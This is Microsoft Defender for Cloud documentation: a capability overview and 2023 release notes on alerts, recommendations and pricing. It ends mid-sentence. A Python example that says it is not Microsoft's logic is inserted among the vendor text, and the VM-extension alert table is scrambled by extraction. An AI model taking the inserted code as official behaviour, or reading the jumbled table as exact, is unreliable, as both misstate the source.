Microsoft Defender for Cloud documentation


Microsoft Defender for Cloud provides unified security management and advanced 
threat protection across hybrid cloud workloads. 


About Defender for Cloud 


OVERVIEW

- What are the key capabilities of Defender for Cloud?
- Which versions of Windows Server and Linux are supported?
- How do I get started with Defender for Cloud?
- What are security policies, initiatives, and recommendations?


Stay current 


WHAT'S NEW

- Release notes for Defender for Cloud
- Important upcoming changes
- Overview of Defender for DevOps
- Microsoft cloud security benchmark in Defender for Cloud


Get started 


GET STARTED

- Enable Defender for Cloud on your subscriptions
- Enable enhanced security features
- Connect hybrid and multicloud machines
- Set up email notifications


Improve your secure score 


HOW-TO GUIDE

- Understanding secure score
- Remediate security recommendations
- Exempt a resource from a recommendation
- Track your scores over time


Mitigate threats 


HOW-TO GUIDE

- Manage just-in-time access
- Set up adaptive application controls
- Implement adaptive network hardening
- Use the Workload protections


Defend multicloud resources 


HOW-TO GUIDE

- Use Defender for Cloud to protect multicloud resources

VIDEO

- Protecting multicloud environments (AWS & GCP)


What is Microsoft Defender for Cloud? 


Article · 07/24/2023


Microsoft Defender for Cloud is a cloud-native application protection platform (CNAPP) 
with a set of security measures and practices designed to protect cloud-based 
applications from various cyber threats and vulnerabilities. Defender for Cloud combines 
the capabilities of: 


- A development security operations (DevSecOps) solution that unifies security management at the code level across multicloud and multiple-pipeline environments
- A cloud security posture management (CSPM) solution that surfaces actions that you can take to prevent breaches
- A cloud workload protection platform (CWPP) with specific protections for servers, containers, storage, databases, and other workloads


[Figure: Microsoft Defender for Cloud. Panels: Unify your DevOps security management; Strengthen and manage your cloud security posture; Protect your cloud workloads]


Note

For Defender for Cloud pricing information, see the pricing page.


Secure cloud applications 


Defender for Cloud helps you to incorporate good security practices early during the 
software development process, or DevSecOps. You can protect your code management 
environments and your code pipelines, and get insights into your development 
environment security posture from a single location. Defender for DevOps, a service 
available in Defender for Cloud, empowers security teams to manage DevOps security 
across multi-pipeline environments. 


Today's applications require security awareness at the code, infrastructure, and runtime 
levels to make sure that deployed applications are hardened against attacks. 


| Capability | What problem does it solve? | Get started | Defender plan |
|---|---|---|---|
| Code pipeline insights | Empowers security teams with the ability to protect applications and resources from code to cloud across multi-pipeline environments, including GitHub and Azure DevOps. Findings from Defender for DevOps, such as IaC misconfigurations and exposed secrets, can then be correlated with other contextual cloud security insights to prioritize remediation in code. | Connect Azure DevOps and GitHub repositories to Defender for Cloud | Defender for DevOps |


Improve your security posture 


The security of your cloud and on-premises resources depends on proper configuration
and deployment. Defender for Cloud recommendations identify the steps that you can
take to secure your environment.


Defender for Cloud includes Foundational CSPM capabilities for free. You can also 
enable advanced CSPM capabilities by enabling the Defender CSPM plan. 


| Capability | What problem does it solve? | Get started | Defender plan |
|---|---|---|---|
| Centralized policy management | Define the security conditions that you want to maintain across your environment. The policy translates to recommendations that identify resource configurations that violate your security policy. The Microsoft cloud security benchmark is a built-in standard that applies security principles with detailed technical implementation guidance for Azure and other cloud providers (such as AWS and GCP). | Customize a security policy | Foundational CSPM (Free) |
| Secure score | Summarize your security posture based on the security recommendations. As you remediate recommendations, your secure score improves. | Track your secure score | Foundational CSPM (Free) |
| Multicloud coverage | Connect to your multicloud environments with agentless methods for CSPM insight and CWP protection. | Connect your Amazon AWS and Google GCP cloud resources to Defender for Cloud | Foundational CSPM (Free) |
| Cloud Security Posture Management (CSPM) | Use the dashboard to see weaknesses in your security posture. | Enable CSPM tools | Foundational CSPM (Free) |
| Advanced Cloud Security Posture Management | Get advanced tools to identify weaknesses in your security posture, including: governance to drive actions to improve your security posture; regulatory compliance to verify compliance with security standards; cloud security explorer to build a comprehensive view of your environment. | Enable CSPM tools | Defender CSPM |
| Data-aware Security Posture | Data-aware security posture automatically discovers datastores containing sensitive data, and helps reduce risk of data breaches. | Enable data-aware security posture | Defender CSPM or Defender for Storage |
| Attack path analysis | Model traffic on your network to identify potential risks before you implement changes to your environment. | Build queries to analyze paths | Defender CSPM |
| Cloud Security Explorer | A map of your cloud environment that lets you build queries to find security risks. | Build queries to find security risks | Defender CSPM |
| Security governance | Drive security improvements through your organization by assigning tasks to resource owners and tracking progress in aligning your security state with your security policy. | Define governance rules | Defender CSPM |
| Microsoft Entra Permissions Management | Provide comprehensive visibility and control over permissions for any identity and any resource in Azure, AWS, and GCP. | Review your Permission Creep Index (CPI) | Defender CSPM |


Protect cloud workloads 


Proactive security principles require that you implement security practices that protect
your workloads from threats. Cloud workload protections (CWP) surface workload-specific
recommendations that lead you to the right security controls to protect your workloads.

When your environment is threatened, security alerts right away indicate the nature and
severity of the threat so you can plan your response. After you identify a threat in your
environment, you need to quickly respond to limit the risk to your resources.


| Capability | What problem does it solve? | Get started | Defender plan |
|---|---|---|---|
| Protect cloud servers | Provide server protections through Microsoft Defender for Endpoint or extended protection with just-in-time network access, file integrity monitoring, vulnerability assessment, and more. | Secure your multicloud and on-premises servers | Defender for Servers |
| Identify threats to your storage resources | Detect unusual and potentially harmful attempts to access or exploit your storage accounts using advanced threat detection capabilities and Microsoft Threat Intelligence data to provide contextual security alerts. | Protect your cloud storage resources | Defender for Storage |
| Protect cloud databases | Protect your entire database estate with attack detection and threat response for the most popular database types in Azure to protect the database engines and data types, according to their attack surface and security risks. | Deploy specialized protections for cloud and on-premises databases | Defender for Azure SQL Databases; Defender for SQL servers on machines; Defender for Open-source relational databases; Defender for Azure Cosmos DB |
| Protect containers | Secure your containers so you can improve, monitor, and maintain the security of your clusters, containers, and their applications with environment hardening, vulnerability assessments, and run-time protection. | Find security risks in your containers | Defender for Containers |
| Infrastructure service insights | Diagnose weaknesses in your application infrastructure that can leave your environment susceptible to attack. | Identify attacks targeting applications running over App Service; Detect attempts to exploit Key Vault accounts; Get alerted on suspicious Resource Manager operations; Expose anomalous DNS activities | Defender for App Service; Defender for Key Vault; Defender for Resource Manager; Defender for DNS |
| Security alerts | Get informed of real-time events that threaten the security of your environment. Alerts are categorized and assigned severity levels to indicate proper responses. | Manage security alerts | Any workload protection Defender plan |
| Security incidents | Correlate alerts to identify attack patterns and integrate with Security Information and Event Management (SIEM), Security Orchestration Automated Response (SOAR), and IT Service Management (ITSM) solutions to respond to threats and limit the risk to your resources. | Export alerts to SIEM, SOAR, or ITSM systems | Any workload protection Defender plan |

Important

As of August 1, customers with an existing subscription to Defender for DNS can
continue to use the service, but new subscribers will receive alerts about suspicious
DNS activity as part of Defender for Servers P2.


Learn More

For more information about Defender for Cloud and how it works, check out:

- A step-by-step walkthrough of Defender for Cloud
- An interview about Defender for Cloud with an expert in cybersecurity in Lessons Learned from the Field
- Microsoft Defender for Cloud - Use cases
- Microsoft Defender for Cloud PoC Series - Microsoft Defender for Containers


Next steps 


Enable Microsoft Defender plans 


What's new in Microsoft Defender for Cloud?

Article · 10/18/2023


Defender for Cloud is in active development and receives improvements on an ongoing 
basis. To stay up to date with the most recent developments, this page provides you 
with information about new features, bug fixes, and deprecated functionality. 


This page is updated frequently with the latest updates in Defender for Cloud. 


Tip

Get notified when this page is updated by copying and pasting the following URL
into your feed reader: https://aka.ms/mdc/rss

To learn about planned changes that are coming soon to Defender for Cloud, see
Important upcoming changes to Microsoft Defender for Cloud.

If you're looking for items older than six months, you can find them in the Archive for
What's new in Microsoft Defender for Cloud.


October 2023 


| Date | Update |
|---|---|
| October 18 | Releasing CIS Azure Foundations Benchmark v2.0.0 in Regulatory Compliance dashboard |


Releasing CIS Azure Foundations Benchmark v2.0.0 in 
regulatory compliance dashboard 


October 18, 2023 


Microsoft Defender for Cloud now supports the latest CIS Azure Security Foundations
Benchmark - version 2.0.0 in the Regulatory Compliance dashboard, as well as a
built-in policy initiative in Azure Policy. The release of version 2.0.0 in Microsoft
Defender for Cloud is a joint collaborative effort between Microsoft, the Center for
Internet Security (CIS), and the user communities. Version 2.0.0 significantly expands
the assessment scope, which now includes 90+ built-in Azure policies, and will succeed
the prior versions 1.4.0, 1.3.0 and 1.0 in Microsoft Defender for Cloud and Azure Policy.

Please refer to this blog post for more details.


September 2023 


| Date | Update |
|---|---|
| September 27 | Data security dashboard available in public preview |
| September 21 | Preview release: New autoprovisioning process for SQL Server on machines plan |
| September 20 | GitHub Advanced Security for Azure DevOps alerts in Defender for Cloud |
| September 11 | Exempt functionality now available for Defender for APIs recommendations |
| September 11 | Create sample alerts for Defender for APIs detections |
| September 6 | Preview release: Containers vulnerability assessment powered by Microsoft Defender Vulnerability Management now supports scan on pull |
| September 6 | Updated naming format of Center for Internet Security (CIS) standards in regulatory compliance |
| September 5 | Sensitive data discovery for PaaS databases (Preview) |
| September 1 | General Availability (GA): malware scanning in Defender for Storage |


Data security dashboard available in public preview 


September 27, 2023 


The data security dashboard is now available in public preview as part of the Defender
CSPM plan. The data security dashboard is an interactive, data-centric dashboard that
illuminates significant risks to sensitive data, prioritizing alerts and potential attack paths
for data across hybrid cloud workloads. Learn more about the data security dashboard.


Preview release: New autoprovisioning process for SQL 
Server on machines plan 


September 21, 2023 


Microsoft Monitoring Agent (MMA) is being deprecated in August 2024. Defender for
Cloud updated its strategy by replacing MMA with the release of a SQL Server-targeted
Azure Monitoring Agent autoprovisioning process.

During the preview, customers who are using the MMA autoprovisioning process with the
Azure Monitor Agent (Preview) option are requested to migrate to the new Azure
Monitoring Agent for SQL server on machines (Preview) autoprovisioning process. The
migration process is seamless and provides continuous protection for all machines.


For more information, see Migrate to SQL server-targeted Azure Monitoring Agent 
autoprovisioning process. 


GitHub Advanced Security for Azure DevOps alerts in 
Defender for Cloud 


September 20, 2023 


You can now view GitHub Advanced Security for Azure DevOps (GHAzDO) alerts related 
to CodeQL, secrets, and dependencies in Defender for Cloud. Results will be displayed in 
the DevOps blade and in Recommendations. To see these results, onboard your 
GHAzDO-enabled repositories to Defender for Cloud. 


Learn more about GitHub Advanced Security for Azure DevOps.


Exempt functionality now available for Defender for APIs 
recommendations 


September 11, 2023 


You can now exempt the following Defender for APIs security recommendations.


| Recommendation | Description & related policy | Severity |
|---|---|---|
| (Preview) API endpoints that are unused should be disabled and removed from the Azure API Management service | As a security best practice, API endpoints that haven't received traffic for 30 days are considered unused, and should be removed from the Azure API Management service. Keeping unused API endpoints might pose a security risk. These might be APIs that should have been deprecated from the Azure API Management service, but have accidentally been left active. Such APIs typically do not receive the most up-to-date security coverage. | Low |
| (Preview) API endpoints in Azure API Management should be authenticated | API endpoints published within Azure API Management should enforce authentication to help minimize security risk. Authentication mechanisms are sometimes implemented incorrectly or are missing. This allows attackers to exploit implementation flaws and to access data. For APIs published in Azure API Management, this recommendation assesses the execution of authentication via the Subscription Keys, JWT, and Client Certificate configured within Azure API Management. If none of these authentication mechanisms are executed during the API call, the API will receive this recommendation. | High |


Learn more about exempting recommendations in Defender for Cloud. 
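The two recommendations above are simple posture rules, so they can be evaluated offline against an inventory of API Management endpoints. The following Python is an added example, not Microsoft's assessment logic (which the page does not describe): the `ApiEndpoint` record shape, the reading of the threshold as "30 or more days", the decision to measure a never-called endpoint from its creation date, and the choice not to flag an endpoint with no calls for the authentication rule are all assumptions of this example. The sample inventory is constructed.

```python
from dataclasses import dataclass, field
from datetime import datetime, timedelta, timezone
from typing import List, Optional, Set, Tuple

# Recommendation names and severities as listed on the page.
REC_UNUSED = ("(Preview) API endpoints that are unused should be disabled and removed "
              "from the Azure API Management service")
REC_UNAUTHENTICATED = "(Preview) API endpoints in Azure API Management should be authenticated"
SEVERITY = {REC_UNUSED: "Low", REC_UNAUTHENTICATED: "High"}

# The three mechanisms the page names for the authentication check.
AUTH_MECHANISMS = {"subscription_key", "jwt", "client_certificate"}
UNUSED_AFTER = timedelta(days=30)


@dataclass
class ApiEndpoint:
    """Constructed inventory record for one endpoint (not the APIM data model)."""
    name: str
    created: datetime
    last_traffic: Optional[datetime]                       # None: no call recorded since creation
    auth_seen_on_calls: Set[str] = field(default_factory=set)  # mechanisms observed executing on calls


def is_unused(ep: ApiEndpoint, now: datetime) -> bool:
    # Assumed reading of the 30-day rule: 30 or more days without traffic counts as unused,
    # and an endpoint that never received a call is measured from its creation date.
    last_seen = ep.last_traffic if ep.last_traffic is not None else ep.created
    return now - last_seen >= UNUSED_AFTER


def is_unauthenticated(ep: ApiEndpoint) -> bool:
    # The page ties this rule to authentication being executed "during the API call", so an
    # endpoint with no calls gives no evidence either way and is not flagged here (assumption).
    if ep.last_traffic is None:
        return False
    return not (ep.auth_seen_on_calls & AUTH_MECHANISMS)


def evaluate(endpoints: List[ApiEndpoint], now: datetime) -> List[Tuple[str, str, str]]:
    """Return (endpoint name, recommendation, severity) for every rule that fires."""
    findings = []
    for ep in endpoints:
        if is_unused(ep, now):
            findings.append((ep.name, REC_UNUSED, SEVERITY[REC_UNUSED]))
        if is_unauthenticated(ep):
            findings.append((ep.name, REC_UNAUTHENTICATED, SEVERITY[REC_UNAUTHENTICATED]))
    return findings


def _utc(y: int, m: int, d: int) -> datetime:
    return datetime(y, m, d, tzinfo=timezone.utc)


NOW = _utc(2023, 9, 11)
# Constructed sample inventory covering the normal case and the edge cases.
SAMPLE_ENDPOINTS = [
    ApiEndpoint("orders-v2", _utc(2023, 1, 1), _utc(2023, 9, 10), {"jwt"}),               # healthy
    ApiEndpoint("orders-v1", _utc(2023, 1, 1), _utc(2023, 7, 1), {"subscription_key"}),  # 72 days idle
    ApiEndpoint("legacy-export", _utc(2023, 6, 1), None),                                 # never called, old
    ApiEndpoint("health-probe", _utc(2023, 9, 1), _utc(2023, 9, 11)),                     # called, no auth
    ApiEndpoint("partner-feed", _utc(2023, 8, 12), _utc(2023, 8, 12)),                    # exactly 30 days, no auth
    ApiEndpoint("new-api", _utc(2023, 9, 5), None),                                       # new, no traffic yet
]

if __name__ == "__main__":
    for name, rec, sev in evaluate(SAMPLE_ENDPOINTS, NOW):
        print(f"{sev:4} {name:14} {rec}")
```

Run against the sample, `orders-v1`, `legacy-export` and `partner-feed` receive the unused recommendation, and `health-probe` and `partner-feed` receive the authentication recommendation; `partner-feed` shows that one endpoint can carry both, and `new-api` shows why a creation date is needed for endpoints that have never been called.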


Create sample alerts for Defender for APIs detections

September 11, 2023


You can now generate sample alerts for the security detections that were released as 
part of the Defender for APIs public preview. Learn more about generating sample alerts 
in Defender for Cloud. 


Preview release: containers vulnerability assessment 
powered by Microsoft Defender Vulnerability 
Management now supports scan on pull 


September 6, 2023 


Containers vulnerability assessment powered by Microsoft Defender Vulnerability 
Management (MDVM), now supports an additional trigger for scanning images pulled 
from an ACR. This newly added trigger provides additional coverage for active images in 
addition to the existing triggers scanning images pushed to an ACR in the last 90 days 
and images currently running in AKS. 


The new trigger will start rolling out today, and is expected to be available to all 
customers by end of September. 


For more information, see Container Vulnerability Assessment powered by MDVM.


Updated naming format of Center for Internet Security 
(CIS) standards in regulatory compliance 


September 6, 2023 


The naming format of CIS (Center for Internet Security) foundations benchmarks in the
compliance dashboard is changed from [Cloud] CIS [version number] to CIS [Cloud]
Foundations v[version number]. Refer to the following table:

| Current Name | New Name |
|---|---|
| Azure CIS 1.1.0 | CIS Azure Foundations v1.1.0 |
| Azure CIS 1.3.0 | CIS Azure Foundations v1.3.0 |
| Azure CIS 1.4.0 | CIS Azure Foundations v1.4.0 |
| AWS CIS 1.2.0 | CIS AWS Foundations v1.2.0 |
| AWS CIS 1.5.0 | CIS AWS Foundations v1.5.0 |
| GCP CIS 1.1.0 | CIS GCP Foundations v1.1.0 |
| GCP CIS 1.2.0 | CIS GCP Foundations v1.2.0 |


Learn how to improve your regulatory compliance. 


Sensitive data discovery for PaaS databases (Preview) 


September 5, 2023 


Data-aware security posture capabilities for frictionless sensitive data discovery for PaaS
databases (Azure SQL Databases and Amazon RDS Instances of any type) are now in
public preview. This public preview allows you to create a map of your critical data
wherever it resides, and the type of data that is found in those databases.

Sensitive data discovery for Azure and AWS databases adds to the shared taxonomy
and configuration, which is already publicly available for cloud object storage resources
(Azure Blob Storage, AWS S3 buckets and GCP storage buckets), and provides a single
configuration and enablement experience.

Databases are scanned on a weekly basis. If you enable sensitive data discovery,
discovery runs within 24 hours. The results can be viewed in the Cloud Security Explorer
or by reviewing the new attack paths for managed databases with sensitive data.

Data-aware security posture for databases is available through the Defender CSPM plan,
and is automatically enabled on subscriptions where the sensitive data discovery option is
enabled.

You can learn more about data-aware security posture in the following articles:

- Support and prerequisites for data-aware security posture
- Enable data-aware security posture
- Explore risks to sensitive data
- Azure data attack paths
- AWS data attack paths


General Availability (GA): malware scanning in Defender 
for Storage 


September 1, 2023 


Malware scanning is now generally available (GA) as an add-on to Defender for Storage. 
Malware scanning in Defender for Storage helps protect your storage accounts from 
malicious content by performing a full malware scan on uploaded content in near real 
time, using Microsoft Defender Antivirus capabilities. It's designed to help fulfill security 
and compliance requirements for handling untrusted content. The malware scanning 
capability is an agentless SaaS solution that allows setup at scale, and supports 
automating response at scale. 


Learn more about malware scanning in Defender for Storage. 


Malware scanning is priced according to your data usage and budget. Billing begins on
September 3, 2023. Visit the pricing page for more information.

If you're using the previous plan (now renamed "Microsoft Defender for Storage
(classic)"), you need to proactively migrate to the new plan in order to enable malware
scanning.

Read the Microsoft Defender for Cloud announcement blog post.


August 2023 


Updates in August include: 


| Date | Update |
|---|---|
| August 30 | Defender For Containers: Agentless Discovery for Kubernetes |
| August 22 | Recommendation release: Microsoft Defender for Storage should be enabled with malware scanning and sensitive data threat detection |
| August 17 | Extended properties in Defender for Cloud security alerts are masked from activity logs |
| August 15 | Preview release of GCP support in Defender CSPM |
| August 7 | New security alerts in Defender for Servers Plan 2: Detecting potential attacks abusing Azure virtual machine extensions |
| August | Business model and pricing updates for Defender for Cloud plans |


Defender For Containers: Agentless discovery for 
Kubernetes 


August 30, 2023 


We're excited to introduce to Defender For Containers: Agentless discovery for 
Kubernetes. This release marks a significant step forward in container security, 
empowering you with advanced insights and comprehensive inventory capabilities for 
Kubernetes environments. The new container offering is powered by the Defender for 
Cloud contextual security graph. Here's what you can expect from this latest update: 


- Agentless Kubernetes discovery
- Comprehensive inventory capabilities
- Kubernetes-specific security insights
- Enhanced risk hunting with Cloud Security Explorer


Agentless discovery for Kubernetes is now available to all Defender For Containers 
customers. You can start using these advanced capabilities today. We encourage you to 
update your subscriptions to have the full set of extensions enabled, and benefit from 
the latest additions and features. Visit the Environment and settings pane of your 
Defender for Containers subscription to enable the extension. 


Note

Enabling the latest additions won't incur new costs to active Defender for
Containers customers.


For more information, see Agentless discovery for Kubernetes. 


Recommendation release: Microsoft Defender for Storage 
should be enabled with malware scanning and sensitive 
data threat detection 


August 22, 2023 


A new recommendation in Defender for Storage has been released. This 
recommendation ensures that Defender for Storage is enabled at the subscription level 
with malware scanning and sensitive data threat detection capabilities. 


| Recommendation | Description |
|---|---|
| Microsoft Defender for Storage should be enabled with malware scanning and sensitive data threat detection | Microsoft Defender for Storage detects potential threats to your storage accounts. It helps prevent the three major impacts on your data and workload: malicious file uploads, sensitive data exfiltration, and data corruption. The new Defender for Storage plan includes malware scanning and sensitive data threat detection. This plan also provides a predictable pricing structure (per storage account) for control over coverage and costs. With a simple agentless setup at scale, when enabled at the subscription level, all existing and newly created storage accounts under that subscription will be automatically protected. You can also exclude specific storage accounts from protected subscriptions. |


This new recommendation replaces the current recommendation Microsoft Defender
for Storage should be enabled (assessment key 1be22853-8ed1-4005-9907-ddad64cb1417).
However, this recommendation will still be available in Azure Government clouds.


Learn more about Microsoft Defender for Storage. 


Extended properties in Defender for Cloud security alerts 
are masked from activity logs 


August 17, 2023 


We recently changed the way security alerts and activity logs are integrated. To better 
protect sensitive customer information, we no longer include this information in activity 
logs. Instead, we mask it with asterisks. However, this information is still available 
through the alerts API, continuous export, and the Defender for Cloud portal. 


Customers who rely on activity logs to export alerts to their SIEM solutions should
consider using a different solution, as it isn't the recommended method for exporting
Defender for Cloud security alerts.


For instructions on how to export Defender for Cloud security alerts to SIEM, SOAR and 
other third party applications, see Stream alerts to a SIEM, SOAR, or IT Service 
Management solution. 


Preview release of GCP support in Defender CSPM 


August 15, 2023 


We're announcing the preview release of the Defender CSPM contextual cloud security
graph and attack path analysis with support for GCP resources. You can apply the power
of Defender CSPM for comprehensive visibility and intelligent cloud security across GCP
resources.

Key features of our GCP support include:

- Attack path analysis - Understand the potential routes attackers might take.
- Cloud security explorer - Proactively identify security risks by running graph-based queries on the security graph.
- Agentless scanning - Scan servers and identify secrets and vulnerabilities without installing an agent.
- Data-aware security posture - Discover and remediate risks to sensitive data in Google Cloud Storage buckets.


Learn more about Defender CSPM plan options. 


New security alerts in Defender for Servers Plan 2: 
Detecting potential attacks abusing Azure virtual machine 
extensions 


August 7, 2023 


This new series of alerts focuses on detecting suspicious activities of Azure virtual 
machine extensions and provides insights into attackers' attempts to compromise and 
perform malicious activities on your virtual machines. 


Microsoft Defender for Servers can now detect suspicious activity of virtual machine
extensions, giving you better coverage of your workloads' security.


Azure virtual machine extensions are small applications that run post-deployment on 
virtual machines and provide capabilities such as configuration, automation, monitoring, 
security, and more. While extensions are a powerful tool, they can be used by threat 


actors for various malicious intents, for example: 


Data collection and monitoring 


Encrypting disks 


Here's a table of the new alerts. 


Alert (alert type) 


Suspicious failure installing GPU extension 
in your subscription (Preview) 
(VM_GPUExtensionSuspiciousFailure) 


Suspicious installation of a GPU extension 
was detected on your virtual machine 
(Preview) 
(VM_GPUDriverExtensionUnusualExecution) 
This alert was released in July 2023. 


Code execution and configuration deployment with high privileges 
Resetting credentials and creating administrative users 


Description MITRE tactics 


Suspicious intent of Impact 
installing a GPU 
extension on 
unsupported VMs. 
This extension 
should be installed 
on virtual machines 
equipped with a 
graphic processor, 
and in this case the 
virtual machines 
aren't equipped with 
such. These failures 
can be seen when 
malicious adversaries 
execute multiple 
installations of such 
extension for crypto- 
mining purposes. 


Suspicious Impact 
installation of a GPU 
extension was 
detected on your 
virtual machine by 
analyzing the Azure 
Resource Manager 
operations in your 
subscription. 
Attackers may use 
the GPU driver 
extension to install 
GPU drivers on your 
virtual machine via 
the Azure Resource 
Manager to perform 
cryptojacking. This 
activity is deemed 
suspicious as the 
principal's behavior 


Severity 


Medium 


Low 


Alert (alert type) Description MITRE tactics Severity 


departs from its 
usual patterns. 


Run Command with a suspicious script was A Run Command Execution High 

detected on your virtual machine (Preview) with a suspicious 

(VM_RunCommandSuspiciousScript) script was detected 
on your virtual 
machine by 
analyzing the Azure 
Resource Manager 
operations in your 
subscription. 
Attackers may use 
Run Command to 
execute malicious 
code with high 
privileges on your 
virtual machine via 
the Azure Resource 
Manager. The script 
is deemed suspicious 
as certain parts were 
identified as being 
potentially malicious. 


Suspicious unauthorized Run Command Suspicious Execution Medium 
usage was detected on your virtual unauthorized usage 

machine (Preview) of Run Command 
(VM_RunCommandSuspiciousFailure) has failed and was 


detected on your 
virtual machine by 
analyzing the Azure 
Resource Manager 
operations in your 
subscription. 
Attackers may 
attempt to use Run 
Command to 
execute malicious 
code with high 
privileges on your 
virtual machines via 
the Azure Resource 
Manager. This 
activity is deemed 
suspicious as it 
hasn't been 


Alert (alert type) 


Suspicious Run Command usage was 


detected on your virtual machine (Preview) 


(VM_RunCommandSuspiciousUsage) 


Suspicious usage of multiple monitoring or 
data collection extensions was detected on 


your virtual machines (Preview) 
(VM_SuspiciousMultiExtensionUsage) 


Description MITRE tactics 


commonly seen 
before. 


Suspicious usage of Execution 
Run Command was 
detected on your 
virtual machine by 
analyzing the Azure 
Resource Manager 
operations in your 
subscription. 
Attackers may use 
Run Command to 
execute malicious 
code with high 
privileges on your 
virtual machines via 
the Azure Resource 
Manager. This 
activity is deemed 
suspicious as it 
hasn't been 
commonly seen 
before. 


Suspicious usage of Reconnaissance 
multiple monitoring 
or data collection 
extensions was 
detected on your 
virtual machines by 
analyzing the Azure 
Resource Manager 
operations in your 
subscription. 
Attackers may abuse 
such extensions for 
data collection, 
network traffic 
monitoring, and 
more, in your 
subscription. This 
usage is deemed 
suspicious as it 
hasn't been 
commonly seen 
before. 


Severity 


Low 


Medium 


Alert: Suspicious installation of disk encryption extensions was detected on your virtual machines (Preview)
Alert type: VM_DiskEncryptionSuspiciousUsage
Description: Suspicious installation of disk encryption extensions was detected on your virtual machines by analyzing the Azure Resource Manager operations in your subscription. Attackers may abuse the disk encryption extension to deploy full disk encryptions on your virtual machines via the Azure Resource Manager in an attempt to perform ransomware activity. This activity is deemed suspicious as it hasn't been commonly seen before and due to the high number of extension installations.
MITRE tactics: Impact
Severity: Medium

Alert: Suspicious usage of VM Access extension was detected on your virtual machines (Preview)
Alert type: VM_VMAccessSuspiciousUsage
Description: Suspicious usage of VM Access extension was detected on your virtual machines. Attackers may abuse the VM Access extension to gain access and compromise your virtual machines with high privileges by resetting access or managing administrative users. This activity is deemed suspicious as the principal's behavior departs from its usual patterns, and due to the high number of the extension installations.
MITRE tactics: Persistence
Severity: Medium

Alert: Desired State Configuration (DSC) extension with a suspicious script was detected on your virtual machine (Preview)
Alert type: VM_DSCExtensionSuspiciousScript
Description: Desired State Configuration (DSC) extension with a suspicious script was detected on your virtual machine by analyzing the Azure Resource Manager operations in your subscription. Attackers may use the Desired State Configuration (DSC) extension to deploy malicious configurations, such as persistence mechanisms, malicious scripts, and more, with high privileges, on your virtual machines. The script is deemed suspicious as certain parts were identified as being potentially malicious.
MITRE tactics: Execution
Severity: High

Alert: Suspicious usage of a Desired State Configuration (DSC) extension was detected on your virtual machines (Preview)
Alert type: VM_DSCExtensionSuspiciousUsage
Description: Suspicious usage of a Desired State Configuration (DSC) extension was detected on your virtual machines by analyzing the Azure Resource Manager operations in your subscription. Attackers may use the Desired State Configuration (DSC) extension to deploy malicious configurations, such as persistence mechanisms, malicious scripts, and more, with high privileges, on your virtual machines. This activity is deemed suspicious as the principal's behavior departs from its usual patterns, and due to the high number of the extension installations.
MITRE tactics: Impact
Severity: Low

Alert: Custom script extension with a suspicious script was detected on your virtual machine (Preview)
Alert type: VM_CustomScriptExtensionSuspiciousCmd
(This alert already exists and has been improved with more enhanced logic and detection methods.)
Description: Custom script extension with a suspicious script was detected on your virtual machine by analyzing the Azure Resource Manager operations in your subscription. Attackers may use Custom script extension to execute malicious code with high privileges on your virtual machine via the Azure Resource Manager. The script is deemed suspicious as certain parts were identified as being potentially malicious.
MITRE tactics: Execution
Severity: High


See the extension-based alerts in Defender for Servers. 


For a complete list of alerts, see the reference table for all security alerts in Microsoft 
Defender for Cloud. 


Business model and pricing updates for Defender for 
Cloud plans 


August 1, 2023 

Microsoft Defender for Cloud has three plans that offer service layer protection: 
• Defender for Key Vault
• Defender for Resource Manager
• Defender for DNS


These plans have transitioned to a new business model with different pricing and 
packaging to address customer feedback regarding spending predictability and 
simplifying the overall cost structure. 


Business model and pricing changes summary: 


Existing customers of Defender for Key Vault, Defender for Resource Manager, and Defender for DNS keep their current business model and pricing unless they actively choose to switch to the new business model and price.


• Defender for Resource Manager: This plan has a fixed price per subscription per month. Customers can switch to the new business model by selecting the Defender for Resource Manager new per-subscription model.

• Defender for Key Vault: This plan has a fixed price per vault, per month with no overage charge. Customers can switch to the new business model by selecting the Defender for Key Vault new per-vault model.

• Defender for DNS: Defender for Servers Plan 2 customers gain access to Defender for DNS value as part of Defender for Servers Plan 2 at no extra cost. Customers that have both Defender for Servers Plan 2 and Defender for DNS are no longer charged for Defender for DNS. Defender for DNS is no longer available as a standalone plan.


Learn more about the pricing for these plans in the Defender for Cloud pricing page.


July 2023 


Updates in July include: 


July 31: Preview release of containers Vulnerability Assessment powered by Microsoft Defender Vulnerability Management (MDVM) in Defender for Containers and Defender for Container Registries
July 30: Agentless container posture in Defender CSPM is now Generally Available
July 20: Management of automatic updates to Defender for Endpoint for Linux
July 18: Agentless secret scanning for virtual machines in Defender for Servers P2 & Defender CSPM
July 12: New security alert in Defender for Servers plan 2: detecting potential attacks leveraging Azure VM GPU driver extensions
July 9: Support for disabling specific vulnerability findings
July 1: Data Aware Security Posture is now Generally Available


Preview release of containers Vulnerability Assessment 
powered by Microsoft Defender Vulnerability 
Management (MDVM) in Defender for Containers and 
Defender for Container Registries 


July 31, 2023 


We're announcing the release of Vulnerability Assessment (VA) for Linux container images in Azure container registries powered by Microsoft Defender Vulnerability Management (MDVM) in Defender for Containers and Defender for Container Registries. The new container VA offering is provided alongside our existing Container VA offering powered by Qualys in both Defender for Containers and Defender for Container Registries, and includes daily rescans of container images, exploitability information, support for OS and programming languages (SCA) and more.


This new offering will start rolling out today, and is expected to be available to all customers by August 7.


For more information, see Container Vulnerability Assessment powered by MDVM and 
Microsoft Defender Vulnerability Management (MDVM). 


Agentless container posture in Defender CSPM is now 
Generally Available 


July 30, 2023 


Agentless container posture capabilities are now Generally Available (GA) as part of the Defender CSPM (Cloud Security Posture Management) plan.


Learn more about agentless container posture in Defender CSPM. 


Management of automatic updates to Defender for 
Endpoint for Linux 


July 20, 2023 


By default, Defender for Cloud attempts to update your Defender for Endpoint for Linux agents onboarded with the MDE.Linux extension. With this release, you can manage this setting and opt out of the default configuration to manage your update cycles manually.


Learn how to manage automatic updates configuration for Linux. 


Agentless secret scanning for virtual machines in 
Defender for servers P2 & Defender CSPM 


July 18, 2023 


Secret scanning is now available as part of the agentless scanning in Defender for Servers P2 and Defender CSPM. This capability helps to detect unmanaged and insecure secrets saved on virtual machines, both in Azure or AWS resources, that can be used to move laterally in the network. If secrets are detected, Defender for Cloud can help to prioritize and take actionable remediation steps to minimize the risk of lateral movement, all without affecting your machine's performance.


For more information about how to protect your secrets with secret scanning, see 
Manage secrets with agentless secret scanning. 


New security alert in Defender for Servers plan 2: 
detecting potential attacks leveraging Azure VM GPU 
driver extensions 


July 12, 2023 


This alert focuses on identifying suspicious activities leveraging Azure virtual machine 
GPU driver extensions and provides insights into attackers’ attempts to compromise 
your virtual machines. The alert targets suspicious deployments of GPU driver 
extensions; such extensions are often abused by threat actors to utilize the full power of 
